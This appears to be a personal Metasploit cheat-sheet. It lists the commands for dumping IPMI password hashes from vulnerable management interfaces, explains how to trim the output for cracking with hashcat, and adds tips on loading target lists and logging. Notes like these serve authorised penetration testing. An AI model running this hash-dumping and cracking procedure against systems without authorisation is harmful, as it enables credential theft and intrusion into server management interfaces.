metasploit (msf)

Grab IPMI hashes from vulnerable systems

msf
use auxiliary/scanner/ipmi/ipmi_dumphashes 
set rhost ip.for.vulnerable.ipmi-interface
set OUTPUT_HASHCAT_FILE /tmp/ipmi.hashcat
run

Open the /tmp/ipmi.hashcat file and remove any IP or user information. For example, if your file looks like this...

192.168.1.5 ADMIN:c28f........

...trim it down so it's just:

c28f........

Then crack with hashcat.

Setting RHOSTS to a file

set rhosts file:/path/to/file

Turn logging/spooling on

spool /tmp/spooly.log